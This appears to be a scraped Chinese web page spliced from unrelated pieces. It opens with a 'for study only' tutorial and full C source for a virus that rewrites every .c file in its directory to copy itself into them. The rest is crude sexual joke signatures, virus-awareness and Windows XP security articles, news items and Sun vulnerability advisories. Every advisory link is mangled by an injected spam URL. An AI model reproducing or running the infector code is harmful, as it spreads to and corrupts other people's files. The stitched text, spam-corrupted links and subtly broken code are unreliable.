老婆，起床啦　劲哥哥

声明:请务恶意使用,否则造成的一切后果自己承担!

首先声明：
本程序是我举的一个例子
为了叫大家理解就可以了
如果大家拿去捉弄人，我不负任何责任！
希望大家要以学习为重！


再次声明这一切全是为了编程研究！！！
病毒的特点：
病毒的最大特点就是自我复制，从病毒的分类来说有很多种，这里我们将介绍最流行的附加式
病毒，它通过对正常的文件进行改写，增加来实现其自我复制的目的。
从程序的角度来说，我们要做的事情有两件：
1，让程序能够将自己在不影响其它程序本身工作的情况下复制给其它程序，
使它具备继续复制的能力。
2，在一定条件下使其产生某种发作效果。
其实第一件事情实际上可以看成对文件进行复制，把病毒源文件的功能函数全部放到被感染
文件的最后，同时在被感染文件中调用这个函数
下面给出c语言的实现过程：
1，主程序调用病毒功能函数
2，病毒功能函数读取查找同目录下所有c文件；
3，找到一个（被感染c文件)，打开它，并且将此文件全部读取到数组变量；
4，重新创建一个同名文件（被感染c文件）
5，数组变量写回这个被感染c文件，同时将病毒源文件所需要的头文件，病毒功能函数
调用语句写入；
6，打开病毒源文件，将病毒功能函数全部写到被感染c文件的最后；
这样一个简单的c语言伪病毒virus.c就完成了
运行程序后其内容变化另保存为after_virus.c
此时，如果我们将1.c文件用A盘复制到其他机器或者Email给别人，结果
他们一运行又感染了他们保存1.c文件目录下所有c文件
对于第二件事情-------“发作效果”，这里只用printf语句警告了一下，当然你
完全可以写一个TSR驻留函数
其实，这个程序勉强可以叫做病毒
根本不算是真正的病毒，好了就说这么多，
代码如下：
#include <stdio.h>
#include <dir.h>
void main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus="virus.c";
char buf[50][80];
char *p;
char *end="return";
char *bracket="}";
char *main="main";
char *include[2]={"stdio.h","dir.h"};
char *int_virus="int virus()";
char *buffer;
int done,i,j=0,flag=0;
printf("\nI have a virus. Writen by PuBin\n");
done = findfirst("*.c",&ffblk,0);
while (!done)
{
i=0;
if ((in = fopen(ffblk.ff_name, "rt"))== NULL)
{
goto next;
}
do{
  if(i>=50)
  {
fclose(in);
goto next;
  }
  p=fgets(buf,80,in);
  i++;
  }while(p!=NULL);
  fclose(in);
  out=fopen(ffblk.ff_name,"w+t");
  fputs("#include<stdio.h>\n",out);
  fputs("#include<dir.h>\n",out);
do
{
if(strstr(buf[j],main)!=NULL)
{
  for(;j<i-1;j++)
  if(strstr(buf[j],end)==NULL&&strstr(buf[j],bracket)==NULL)
  fputs(buf[j],out);
  else
  {
  if(flag==0)
  {
flag=1;
fputs("virus();\n",out);
  }
  fputs(buf[j],out);
  }
}
else if((strstr(buf[j],include[0])==NULL)
&&(strstr(buf[j],include[1])==NULL))
{
fputs(buf[j],out);
j++;
}
else
j++;
}while(j<i-1);
read=fopen(virus,"rt");
do
{
p=fgets(buffer,80,read);
if(strstr(buffer,int_virus))
while(p!=NULL)
{
if(strstr(buffer,virus)==NULL)
fputs(buffer,out);
else
{
          fputs(" char *virus=\"",out);
fputs(ffblk.ff_name,out);
    fputs("\";\n",out);
}
p=fgets(buffer,80,read);
}
}while(p!=NULL);

fclose(read);
fclose(out);
    printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);
next: done = findnext(&ffblk);
}
return 0;
}

1.柏芝你走吧，我舍不得韩红！！！

　　2.按猪的审美观，我基本算得上是个帅哥~

　　3.我不是你想象中的那样完美那样坚强，金钱和美女就足以把我征服！

　　4.见到我以后你会突然发现——原来帅也可以这样具体呀~

　　5.姑姑，十六年后我们断肠崖见，到时候别忘了给我发短信！

　　6.自从两个妓女自称是某名牌大学的毕业生后，我现在一般都自称文盲！

　　7.天使和魔鬼拿我的灵魂拔河玩~

　　8.我曾经是个天使，真的！在降临人间时上帝慈祥地对我说：“去吧，孩子，你是个为补考而生的男人……”

　　9.初夜让人用肚脐眼给骗了：(

　　10.男二号对女一号说：“你为什么要背着我爱别人！”(2006隐讳签名之离骚)

　　11.本人中科院高级潜水院院士，诺贝尔长期掉线奖，奥斯卡终身隐身奖~~~

　　12.为人不识浙大男，便称猥琐也枉然～

　　13.男人偷腥时的智商仅次于爱因斯坦！

　　14.房价越来越高，所以，好男人越来越少……

　　15.生病了绝不能去医院，去医院我就会因为没钱吃饭而饿死……

　　16.自去年“麦莎事件”后，CCTV现在唯一能让人相信的恐怕只剩下整点报时了……

　　17.午夜十二点准时下线！否则，公主就会变回灰姑娘～

　　18.我大声地咆哮，在寂静的厕所之中。你投射过来异样的眼神，诧异也好，不爽也罢，并不曾使我的声音变小。因为使我秀逗的，不是你走错了厕所，而是我忘带了手纸。

　　19.出门在外，请记住：一定要把牛B还给牛！

　　20.剥夺人民说话的权利，就如同xxxx犯将一个女人摁倒在地却脱不下她的裤子一样令人抓狂～

　　21.爱我免费，包年优惠！

　　22.小姐站住，站住！想和我谈恋爱么？

　　23.坐拥大奶名号，享受二奶待遇

　　24.人生得意须尽欢，莫使娇妻空对房！

　　25.在天愿做比翼鸟在地愿做同圈猪！

　　26.三个月了——不是你的……

　　27.爸问我为什么背着他学抽烟？我说：“台湾不回归，心情很郁闷！”

　　28.她在床上和床下一样咄咄逼人！

　　29.她说：“我要玩的是感觉，不是你的器官！”

　　30.我喜欢“三心二意”的人：对我有爱心，对我有信心，对我有责任心；说话有创意，令我“满意”！

　　30.五马分尸中……你来一块不？

　　31.就叫我朝伟吧，虽然歌唱得像学友~

　　32.在喂猪的时候总会想起你……

　　33.上帝说：“要有光。”我说：“不批准！”于是便有了黑夜……

　　34.自打我变成了一泡屎，就再也没有人敢踩在我头顶上啦～

　　35.穿“人”字拖鞋，与刘翔赛跨栏，一局定乾坤，输了就引退江湖，目前正在积极备战ing……

　　36.我把KONKA的电视遥控器别在裤腰上，我假装新买了个NOKIA手机……

　　37.如果早上来的晚一些，我想我会喜欢早上的～

　　38.给我织一条围巾，我愿以一生关怀相回报。否则，你就用围巾勒死我吧！！

　　39.你的丑和你的脸没有关系……

　　40.一生中真爱一个女人就够了，哪个说不够我和他拼命！！！

　　41.一时的冲动，子孙的危机！

　　42.xxxx易躲，意淫难防！

　　43.上床前请出示您的健康证！

　　44.生活就是胡说八道加胡思乱想，所以简单生活要求不胡说八道加少胡思乱想！

　　45.想污染一个地方有两种方法：垃圾，或是钞票！

　　46.淫以为荣，醉有风度~

　　47.宁尝鲜蜜一口，不吃烂桃一筐！

　　48.这个字念：锊！

　　49.真爱你的不是在雨天能为你撑起伞的那个人，而是能陪你一起淋病的那个

　　50.中国足球队对中国的唯一贡献是——让越来越多的人关心起篮球！

　　51.08年8月8号结婚是个不错的主意~

　　52.人生就是一场游戏，你遇到的障碍就是各种关卡，所以，让我们尽情地去攻略吧！

　　53.说什么都是废话——因为你就是个废人！

　　54.动物的种类在减少，人的种类在增加吗？

　　55.若非当初拒绝穿上疯狂的红舞鞋，想必现在也旋转得像个陀螺吧？

　　56.你可以像猪一样的生活，但你永远都不能像猪那样快乐！

　　57.曰出只要在曰落前出现就好，上课只要在下课前到达就好。

　　58.人总要犯错误的，否则正确之路人满为患～

　　59.不要把时间浪费在不在乎你的人身上，受不了就去魔兽！

　　60.拉屎最低配置：钱江晚报一份；建议配置：体坛周报一份+草纸一张；豪华配置：中华一根+花花公子一本+草纸若干。

　　61.我喝水只喝纯净水，牛奶只喝纯牛奶，所以我很单纯……

　　62.为配合今年中国计划生育工作的胜利完成，本人决定暂时不和异性朋友接触，谢谢合作～

　　63.既然男人都靠不住，那我还是找个又帅又有钱的吧～

　　64.只要不下流，我们就是主流！

　　65.为中华而努力读书！一包中华好多钱啊~~~

　　66.我只说三句话，包括上面那句，我的话完了！

　　67.老板，38的鞋太小，39的又太大！

　　68.有肉的时候吃豆腐，有豆腐的时候吃肉；没豆腐没肉的时候才会想念一个人～

　　69.上帝说：“要有光。”我说：“不批准！”于是便有了黑夜……

　　70.此人已死，有事扒我坟！

　　71.人在新浪钻，哪儿能不挨砖？曰啖板砖三百颗，不辞长做新浪人～

　　72.当你后有追兵却又面对悬崖时，不跳，你就丧失一次机会；跳下去，你将丧失更多机会！！

　　73.做人要长着坏心眼做好事~

　　74.曰后咋办？曰后再说！！！

　　75.跟我走，我带你去梦游！

　　76.八戒的老婆是谁？猪啊~~~

　　77.男人宁愿要一个侍奉自己的奴隶，也不愿意要一个自己侍奉的公主~

　　78.男人在不懂的时候装懂，而女人则恰好相反~

　　79.我把一万句誓言装在机枪里向你扫射，你倒在血泊中，浑身镶满了丘比特的子弹！

　　80.车到山前必有路！我靠，TMD是条死路！！！

　　81.嫁给你，和当尼姑有什么区别！

　　82.对丑人细看是一种残忍，除非你想惩罚他！

　　83.寻人启示：王海亮，男，22岁，长的帅，榆树人氏。为弱智儿童，曰前不慎走失，有见到者，帮忙揍一顿，必有重谢！

　　84.一曰，吾忽觉腹胀，天眼有物欲坠焉，起而如厕，力及处，屙得一大光球，名之曰太阳。再而屙，又得一蓝色球体者，堕于地，是以曰地球。久屙未爽，复以指抠，得小粪球一只，思之家中贫困无灯，遂以月亮为之名，以示草民之愿也。然人皆有粪，是以星空灿烂哉！

　　85.现在的社会根本没有英雄好汉——英雄都盖在国旗下，好汉都在法院门口墙上贴着——门右边的墙！

　　86.其实我小时候的梦想并不是要当什么科学家，我只是幻想自己是地主家的少爷，家有良田千顷，终曰不学无术，没事领着一群狗奴才上街去调戏一下良家少女……

　　87.我用四年的时间完成对大学的祭奠！

　　88.读十年书不如养一头猪，读十年书养不活一头猪，读十年书不如做一头猪，读十年书还不如一头猪！

　　89.曰本一天不陪罪，我就一天不会从数学补考教室出来！！

　　90.本人立志统一全人类，请大家投我一票！

　　91.嗨，那个撬地球的家伙！

　　92.看到这受不了了，z'a，快带我走吧，韩红我也不要了！！！：)

　　病毒都喜欢那些软件呢？下面我们给大家列出了病毒喜欢的六种软件。
Windows操作系统
　　Windows系列操作系统之所以容易受到病毒攻击，主要是因为操作系统设计复杂，会出现大量的安全漏洞。如2003年8月份全球泛滥的“冲击波”病毒就是利用了系统的RPC缓冲区漏洞才得以大面积传播与泛滥。
　　漏洞是指操作系统中的某些程序中存在有一些人为的逻辑错误，这些错误隐藏很深，一般是被一些程序员或编程爱好者在研究系统的过程中偶然发现的，这些发现的错误公布后很可能被一些黑客利用，于是这些能被利用的逻辑错误就成了漏洞。
　　除了RPC漏洞外，操作系统还存在许多其它的漏洞，比如说年初的“蠕虫王”病毒就是利用了SQL Server 2000的缓冲区漏洞。据不完全统计，Windows NT系列操作系统已存在有近千个已知的安全漏洞。而随着新操作系统的推出，新漏洞将会更多地被发现。
　　安全建议：对于我们普通用户，大家首先应该是填补漏洞，操作系统的漏洞就像一个非法的通道，通过这个通道病毒可以随意进入用户的电脑，所以要想使操作系统安全就必须定期升级系统，给系统打上安全补丁。建议大家经常去微软网站下载补丁包来升级系统，例如最新的SERVER PACK 4补丁包能修补600多个安全漏洞。
　　当用户填补完系统漏洞后，笔者建议大家选用一款专业的杀毒软件来全面保护系统。经常升级的杀毒软件将能最大限度地保护电脑，免除隐患。
即时通讯软件
　　QQ、MSN、网易泡泡这些即时聊天软件的出现拉近了人与人之间的距离。据说QQ软件在中国已经拥有了1亿多用户，每天都有几十万的用户同时在线。然而，随着这类软件使用人数的增加，这类软件也成了病毒的新攻击对象。
　　攻击即时通讯软件的病毒主要有两种形式。一种是偷盗用户号码。它会将自己伪装成即时通讯软件的登录页面来欺骗用户，当用户在这个登录框中输入自己的用户名和密码时，病毒便会自动将这些信息发送到指定邮箱，从而失去即时通讯软件中的网络身份。另一种是利用即时通讯软件的活链接功能来进行传播，活链接功能即当用户收到好友发来的一个网址时，只要点击该网址就能直接进入该网页。由于该功能的方便性，被很多病毒利用，病毒运行时会利用聊天窗口向所有在线好友发送一个病毒网址的活链接，当好友误以为是有用网址点击时就会中毒，从而使病毒得到广泛传播。比如在去年大规模泛滥的“QQ尾巴”病毒，该病毒运行时会向正在聊天的QQ用户发送消息，收到消息的QQ好友如果点击该链接地址的话，就会中毒，然后继续感染其它正在QQ上聊天的QQ好友。
　　安全建议：这类软件设计比较简单，所以笔者估计类似“QQ尾巴”的病毒还将大量出现。用户可以下载专门的病毒专杀工具定期清除电脑中隐藏的病毒，对电脑比较了解的用户还可以使用防火墙来防止一些非法的程序来访问网络。此外用户还可以使用一些专门的即时通讯保护软件来防止未知病毒的破坏，因为国内的几家反病毒公司都在积极研制即时通讯软件的保护产品，象瑞星公司就在与腾讯公司积极进行深层次的技术合作，相信不久以后，用户就可以用到这些即时通讯保护产品。
网络游戏软件
　　目前市场上流行的网络游戏已达数十种。网络游戏的火暴让攻击网络游戏的病毒也大量地滋生。它们的主要特点就是盗号，盗号成功后病毒释放者就会将被盗网络游戏用户的身份以及价值不菲的虚拟财产偷走，攻击网络游戏软件的病毒大多数会通过网络扫描的方式或者向外发送大量病毒邮件的方式来感染用户计算机，感染成功后，病毒就会偷盗特定网络游戏的密码信息，然后在电脑联网时将这些信息发送到指定信箱。如“密码狩猎者”病毒就是这样的病毒，病毒运行时会通过局域网传播并偷盗“传奇”游戏的密码，使用户的游戏身份和虚拟财产丢失。
　　安全建议：由于攻击网络游戏的病毒很多，而且病毒变种产生的速度也很快，笔者建议玩家在玩游戏时打开实时监控程序来防止病毒攻击。除此之外，用户还可以采用网络游戏保护产品来保护某些网络游戏，只要配置得当，就能防止该网络游戏被任何病毒攻击。
Outlook类软件
　　Outlook以及Outlook Express是最常用的邮件客户端软件，也是非常容易受到邮件病毒攻击的软件。由于这类软件有两个重要漏洞：预览漏洞和执行漏洞，因此产生了大量利用这两个漏洞的病毒。利用预览漏洞编写的病毒，用户只要一点击该病毒邮件，病毒就会自动执行破坏代码，使用户防不胜防。利用执行漏洞编写的病毒，它的带毒邮件会有一个特点，就是邮件很大但用户却看不到附件，原因是病毒利用邮件编码功能将自身以媒体形式隐藏在邮件的正文中，只要用户打开该邮件，病毒就会自动还原成病毒，继而对用户电脑进行破坏。如“欢乐时光”病毒会将自己伪装成信纸，然后附加到邮件的正文中四处传播;而“求职信”病毒则是利用邮件预览漏洞进行传播的。
　　安全建议：保护这类软件的最好的方法是使用杀毒软件的邮件监控功能。几乎每种杀毒软件都提供了邮件监控功能，该监控程序会监控邮件形成、发送、接收的全过程，在接收或者发送邮件的同时对该邮件进行病毒扫描，发现病毒时就会提醒用户采取相应的措施。
IE浏览器
　　IE浏览器是我们使用最多的浏览器，它也存在许多安全漏洞并成为了病毒的攻击对象。最常见的病毒攻击方式是利用脚本执行漏洞。该漏洞会在用户浏览网页时自动执行网页中的有害脚本程序，或者自动下载一些有害的病毒，从而对用户的电脑造成破坏。如“极限女孩”病毒，它内嵌在网页中，当用户在不知情的情况下打开含有该病毒的网页时，病毒就会修改用户的IE默认首页、在桌面上建立大量的色情网站链接，影响用户正常使用计算机。
　　安全建议：保护IE浏览器的最好方法是使用杀毒软件的脚本监控功能和注册表修复工具。脚本监控功能会从系统的底层监视IE浏览器的网页执行情况，当发现有病毒时，该监控就会提示用户，采取相应的措施。而注册表修复工具可以修复被病毒破坏的注册表信息。
P2P软件
　　P2P软件是点对点的传输通讯工具，只要使用同一个P2P软件，用户之间就可以直接进行交流、聊天、交换文件等。随着P2P软件使用范围的普及，有越来越多的病毒开始盯上这类软件。大多数攻击P2P软件的病毒都是利用自动配置脚本和共享目录进行传播。病毒感染用户电脑时就会查找这些P2P软件所在的目录，然后将自身加入到脚本配置文件中，由该配置文件自动将病毒传播出去。或者病毒会将自己拷贝到P2P软件的共享目录中去，并由P2P软件的其它用户主动运行病毒，从而造成病毒传播。像去年泛滥的“泡沫人”病毒就是一个通过P2P软件的共享目录进行传播的恶性病毒，病毒泛滥时会造成网络阻塞。
　　安全建议：对付这类病毒，可以采用杀毒软件的文件监控及内存监控功能了。文件监控是监视系统中的所有文件读写操作，发现病毒时就会直接将病毒清除，而内存监控则会监视内存中活的病毒，在病毒还未发作时，将病毒清除。
总 结
　　经过分析，笔者发现只要是功能强大、用户群多或者有利可图的软件，都是病毒攻击的重点，这一点是我们分析一个软件是否会受到病毒攻击的标准。而根据病毒产生的逻辑，笔者预计网络游戏软件病毒和即时通讯软件病毒爆发的频率将大大增加，建议用户对这两类软件要特别注意病毒的防护。

　　微软的新一代操作系统vista已经推出一段时间，但由于用户硬件系统面临的更新换代以及软件与Vista系统的兼容等若干原因，大部分用户还是在广泛使用着Windows XP的系统。所以有必要旧话重提，在这篇文章中谈一些Windows XP的安全方面的操作策略，使尽可能地少一些来自于病毒、黑客方面的攻击。
1、屏蔽不需要的服务组件
　　尽管服务组件安装得越多，用户可以享受的服务功能也就越多。但是用户平时使用到的服务组件毕竟还是有限，而那些很少用到的组件不但占用了不少系统资源，会引起系统不稳定外，它还会为黑客的远程入侵提供了多种途径，为此我们应该尽量把那些暂不需要的服务组件屏蔽掉。具体的操作方法为：首先在控制面板中找到“服务和应用程序”图标，然后再打开“服务”对话框，在该对话框中选中需要屏蔽的程序，并单击鼠标右键，从弹出的快捷菜单中依次选择“属性”/ “停止”命令，同时将“启动类型”设置为“手动”或“已禁用”，这样就可以对指定的服务组件进行屏蔽了。
2、及时使用Windows Update更新系统
　　Windows Update做为微软公司保护系统安全、提高Windows性能的重要组件，目前已经走进了它的V6版本。通过它，我们不但可以获得提升系统功能和性能的组件Service Pack(如目前流行的Windows XP Service Pack 2)，同时也可以获得最新安全漏洞的补丁，当然你也可以获得最新的硬件驱动。最新、最流行的病毒、木马、蠕虫等通常都利用了操作系统的最新的漏洞，如果在它们大规模发作之前，就能升级好最新的补丁，那么计算机受到攻击导致瘫陷的几率将大大降低。
3、对重要信息进行加密
　　为防止其他人在使用自己的电脑时，偷看自己存储在电脑中的文件信息，Windows XP特意为我们普通用户提供了“文件和文件夹加密”功能，利用该功能我们可以对存储在电脑中的重要信息进行加密，这样其他用户在没有密码的情况下是无法访问文件或者文件夹中的内容的。在对文件进行加密时，我们首先打开Windows XP的资源管理器，然后在资源管理器操作窗口中找到需要进行加密的文件或者文件夹，然后用鼠标右键单击选中的文件或文件夹，从弹出的快捷菜单中选择“属性”命令，随后Windows XP会弹出文件加密对话框，单击对话框中的“常规”标签，然后再依次选择“高级”/“加密内容以便保护数据”就可以了。
4、锁定您的计算机
　　如果在使用电脑的过程中因有急事需要短暂离开电脑的话，许多人因担心自己的电脑会被别人占用，往往会采取先关机，后离开，然后回来再开机的办法来处理，但这样频繁开关机器对电脑是不利的。那我们有没有办法做到既不要关机又能防止其他人使用自己的计算机呢？办法当然有，您可以通过双击桌面快捷方式来迅速锁定键盘和显示器，而无需使用CTRL+ALT+DEL组合键或屏幕保护程序。
　　在锁定您的计算机时，您可以参照如下的步骤来执行：先用鼠标右键单击Windows XP的桌面，然后在右键菜单中依次选择新建/快捷方式，随后按照屏幕提示，在命令行的文本框中输入rundll32.exe user32.dll,LockWorkStation命令字符，再在随后的向导窗口中输入对应该快捷方式的具体名称，在这里为方便以后调用，您可以直接为该快捷方式取名为锁定计算机就可以了。以后您只要双击桌面上的“锁定计算机”，就可以达到锁定的目的了。或可以直接按下“windows键+L”的快捷键来锁定计算机。
5、使用“连接防火墙”功能
　　在网络时代中，病毒的传播方式、传播速度和破坏力发生了翻天覆地变化，而且黑客行为也正在全世界范围内活动。为了防止病毒和黑客的随意入侵，不少用户在自己的计算机中都安装了防火墙。而Windows XP就加入了“Internet 连接防火墙”功能，利用该功能，Windows XP能对出入系统的所有信息进行动态数据包筛选，允许系统同意访问的人与数据进入自己的内部网络，同时将不允许的用户与数据拒之门外，最大限度地阻止网络中的黑客来访问自己的网络，防止他们随意更改、移动甚至删除网络上的重要信息。在使用“连接防火墙”功能时，您可以依次单击开始菜单中的“设置”/“网络连接”菜单项，然后从弹出的窗口中选择需要上网的拨号连接，然后用鼠标右键单击该连接图标，并选择“属性”命令，在随后弹出的拨号属性窗口中再单击高级标签，在对应标签的页面中选中“Internet连接防火墙”选项，然后再单击对应防火墙的“设置”按钮，来根据自己的要求设置一下防火墙，以便防火墙能更高效地工作。
6、安装第三方的杀毒程序、防火墙程序及上网安全保护程序
　　事实证明，“Internet 连接防火墙”的功能局限性很大，首先它并不具备杀毒、防毒的功用，其次在防火墙技术上保护很有限，效果微乎其微。用户有必要在开启“Internet 连接防火墙”的基础上再加装第三方的防火墙程序。防火墙软件的选用，首先要看实际的防护效果，能不能有效及时地在程序访问外界的时候第一时间发出提示寻问，并且在受到外界的各类攻击时能不能有效地屏蔽、过滤掉数据包，瑞星防火墙更加入了“追踪位置”的技术，能实时地监视受到的攻击并主动追踪其位置。杀毒程序是必须要安装的，杀毒的效率是值得考虑的问题，另外实时防毒效果更应该受到关注。在防护方面，瑞星杀毒软件监控相当全面，注册表的监控最为有效地防范了恶意的程序、木马等在用户不知情的情况下植入计算机中。
7、为自己分配管理权限
　　安装在Windows XP操作系统中的许多程序，都要求用户具有一定的管理权限才能让用户使用程序，因此为了能够使用好程序，我们有时需要为自己临时分配一个访问程序的管理权限。在分配管理权限时，我们可以先普通用户身份登录到Windows XP的系统中，然后用鼠标右键单击程序安装文件，同时按住键盘上的Shift键，从随后出现的快捷菜单中点击运行方式，最后在弹出的窗口中输入具有相应管理权限的用户名和密码就可以了。

　网络淫秽色情给人们尤其是青少年带来的危害不容低估，对其进行依法打击是广大百姓的要求和期盼。公安部副部长张新枫近日在接受记者专访时表示，要坚决刹住互联网“黄”风，为广大人民群众，特别是青少年营造一个和谐、文明、健康的互联网环境。
　　清理有害信息16万多条
　　“全国依法打击网络淫秽色情专项行动自4月12日部署开展以来，集中查办了一批网上违法犯罪案件，有力地遏制了淫秽色情等有害信息在网上传播蔓延势头，取得了初步成效。”张新枫说。
　　公安部提供的数字显示，截至5月15日，全国各地共清理、删除网上淫秽色情信息等有害信息16万多条，其中淫秽色情信息9万多条，诈骗、赌博等有害信息7万多条；依法关闭违法网站和网上信息服务栏目4800多个；各级公安机关立案侦查网络淫秽色情违法犯罪案件1170多起，侦破案件244起，抓获涉案违法犯罪嫌疑人270多名。
　　三大措施进行打击清理
　　张新枫说，公安机关将一如既往，进一步加强依法打击、清理工作，深入开展互联网安全监督管理工作。
　　一是开展为期一个月的案件攻坚和集中清理行动。各地公安机关将在6月集中一个月时间组织力量进行案件攻坚，公安部对一批重点案件挂牌督办，全力侦破一批有影响的传播网络淫秽色情等违法犯罪案件，对淫秽色情信息再进行一次彻底清理，对诈骗、赌博等有害信息也要一并清除。二是开展互联网安全管理秩序集中整顿工作。三是推进公安机关互联网公开管理工作。

eNet硅谷动力

　　【eNet硅谷动力消息】巴黎5月25日消息，Google打算回复向它提出警告的欧盟，从安全和商业角度考虑它需要将用户的搜索数据保持两年时间。此前欧盟警告Google称，它可能因这样地保持用户数据而违反欧盟的隐私法。
　　这家全球最大的搜索引擎巨头周五表示，它将在6月19日回答来自欧盟数据保护咨询组织的一封信件。该组织对Google保留用户的搜索信息时间太长一事，表示了担心。Google全球隐私权律师彼特-弗莱舍(Peter Fleischer)在接受媒体一个电话采访中说：“欧盟法律规定，搜集它的用户数据的公司保留这些数据的时间应当在他们使用这些数据的必须时间内，但是不能够超过这个时间。”Google股价并没有受到此警告的影响，截止格林威治时间1456反而上涨了1.7%，每股涨至482.26美元。
　　通过每次搜索，Google收集了关于用户嗜好、兴趣、信念方面的信息，而这些信息有可能被广告商等第三方所使用。但是对此疑虑， Google表示绝不会传播这些信息。Google上周收到了来自由一群制定欧盟隐私政策各国官员组成的“第29条工作组”(The Article 29 working party)的一封信件，该信件要求Google证明其数据保留行为的正当性。
　　弗莱舍说：“我想告诉该工作小组的是，Google需要保留这些数据，原因是它要用来保护它的系统免遭攻击，并且以此来完善和改进我们的搜索结果的效率。”他称，Google在3月份已经决定将它引擎搜索信息保留时间限制在18-24个月。此前，该公司并没有限定这样的时间。

受影响系统：
Sun Java System Web Proxy Server < 4.0.4
不受影响系统：
Sun Java System Web Proxy Server 4.0.4
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 24165
Sun Java System Web Proxy Server是一款基于WEB的代理服务程序。
Sun Java System Web Proxy Server的SOCKS模块中的两个缓冲区溢出，可能允许本地或远程非特权用户在协议协商期间控制某些字节触发这些溢出，以SOCKS服务器的权限执行任意指令或导致SOCKS服务器拒绝服务。SOCKS服务器通常是以root用户权限运行的。
<*来源：iDEFENSE

链接：http://www.sms55.cn/reg.htm谢谢支持sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102927-1
http://www.sms55.cn/reg.htm谢谢支持labs.idefense.com/intelligence/vulnerabilities/display.php?id=536
*>
建议：
--------------------------------------------------------------------------------
临时解决方法：
* 可在Proxy Server例程目录下使用stop-sockd脚本关闭SOCKS服务器。
厂商补丁：
Sun
---
Sun已经为此发布了一个安全公告（Sun-Alert-102927）以及相应补丁:
Sun-Alert-102927：Security Vulnerabilities in the SOCKS Module of Sun Java System Web Proxy Server 4.0
链接：http://www.sms55.cn/reg.htm谢谢支持sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102927-1
补丁下载：
http://www.sms55.cn/reg.htm谢谢支持www.sun.com/download/products.xml?id=4648dc96

受影响系统：
Sun Solaris 9.0_x86
Sun Solaris 9.0
Sun Solaris 8.0_x86
Sun Solaris 8.0
Sun Solaris 10_x86
Sun Solaris 10.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 24145
Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。
Solaris的NFS客户端处理畸形请求时存在漏洞，远程攻击者可能利用此漏洞导致系统忙碌。
远程攻击者可以通过向Solaris的NFS客户端模块发送acl(2)报文导致NFS服务器忙碌，造成拒绝服务的情况。仅在将Solaris系统配置为NFS服务器的情况下才会出现这个漏洞。
<*来源：Andrzej Dereszowski （deresz@gmail.com）

链接：http://www.sms55.cn/reg.htm谢谢支持secunia.com/advisories/25403/
http://www.sms55.cn/reg.htm谢谢支持sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102911-1
*>
建议：
--------------------------------------------------------------------------------
临时解决方法：
* 通过以下命令禁用NFS服务器：

Solaris 8和9：
# /etc/init.d/nfs.server stop
Solaris 10：
# svcadm disable svc:/network/nfs/server:default
厂商补丁：
Sun
---
Sun已经为此发布了一个安全公告（Sun-Alert-102911）以及相应补丁:
Sun-Alert-102911：Security Vulnerability in NFS Client Module May Lead to a Denial of Service Condition
链接：http://www.sms55.cn/reg.htm谢谢支持sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102911-1

在QQ秀、虚拟宠物等个人增值服务取得一定市场后，腾讯的下一步增值业务经营模式已经逐渐浮上水面——其以财付通电子支付平台为基础，联合南航推出的QQ在线购买电子机票服务以及在线客户管理系统(CRM)内测于昨日相继推出。
　　在昨日上午的“南航•腾讯电子客票战略合作签约仪式”上，腾讯总裁刘炽平亲自为财付通而站台。宣布腾讯与南航本次推出的合作，可让用户只需登陆QQ，即能通过腾讯财付通，直接查询南航航班，在线购买南航电子客票，在网上自由选择座位、打印登机牌或在机场自助办理登机牌。“对于习惯网上冲浪的QQ用户来说，购买南航电子客票、乘坐南航航班就像网上聊天一样方便快捷。”
　　南航自2000年推出第一张电子客票以来已经在网上购票上有一套成熟的电子商务系统辅助旅客一站式完成购票、登机等流程。上月，南航才刚与中移动推出手机办理登机手续服务。这次与腾讯进行合作，在南航网站的电子购票页面上也有财付通平台进行电子付费的入口。南航股份公司副总经理何宗凯直接表示，南航看中的正是腾讯所拥有的庞大用户量，希望能够借腾讯QQ平台为南航带来更多的机票订单。为了提升QQ用户对在线定购南航机票的兴趣，南航和腾讯还宣布长期推出提前购票优惠活动，旅客提前15天以上购票将有机会享受5折以下超值优惠。旅客通过QQ提前购买南航电子客票，除享受南航的优惠机票外，还有机会获得QQ公仔等礼品。
　　消息人士透露腾讯这次与南航方面在B2C上的合作仅仅是开端，腾讯不仅希望与南航合作推广其财付通电子支付平台，而且还希望今后能够承接南航的在线客户管理系统业务。该项业务于昨日推出内测，已经向用户发放出了1000个测试邀请。内测时间将从2007年5月28日持续到6月30日。
　　本次公测的腾讯客户管理系统将QQ聊天软件与网页端结合在一起，为企业提供客户服务和CRM功能的客服管理软件。该系统主要面向打算使用QQ作为客服工具的企业和个人商户，“更注重工作环境下的信息安全和客户资料管理。”新功能包括网页版聊天、无好友上限、1号多机使用、更安全的密码保护技术、聊天记录保存、客户回访及图表统计功能等。
　　有业内人士认为腾讯的增值服务拓展已经让市场闻到了硝烟。例如在机票定购方面，以“快钱”为代表的电子支付平台，一向标称自己“不与商家争夺利益”，因此本身并没有涉足与客户有冲突的买卖业务。而腾讯与南航进行合作以后，旅客可参与机票直销模式，自然与票务代理有所冲突。此外，刚进行公测的客户管理系统，也会对目前大大小小的在线支持以及客户管理服务产生竞争关系。

天网恢恢,疏而不漏!
　　两名大学生放弃校园生活，与一位名叫刘林的男子一道，合伙租房开办网络工作室。凭借高超的网络技术，他们很快窃取了成都两大网络游戏公司的账号。在不到1个月时间内，他们就成功盗窃价值人民币33158元的游戏卡。在西安警方的协助下，成都警方远赴西安将3人抓获。昨日，武侯法院以盗窃罪，对3人分别处两至三年有期徒刑，并各处2000元罚金。

　　两地互动外地抓回3“黑客”

　　去年6月，成都某信息网络公司吃惊地发现，公司多个网络游戏充值账户内的游戏充值卡被盗取，折合人民币总值2000余元。成都警方接到报警后通过上网监测发现，被盗公司充值账号内的货币均被另一网络用户转走。警方很快锁定了一名行盗的网络“黑客”。警方通过网络追踪发现，盗窃虚拟货币的网络用户地址在西安。成都警方于是将案情通报给了西安警方，并请求对方协助侦查。

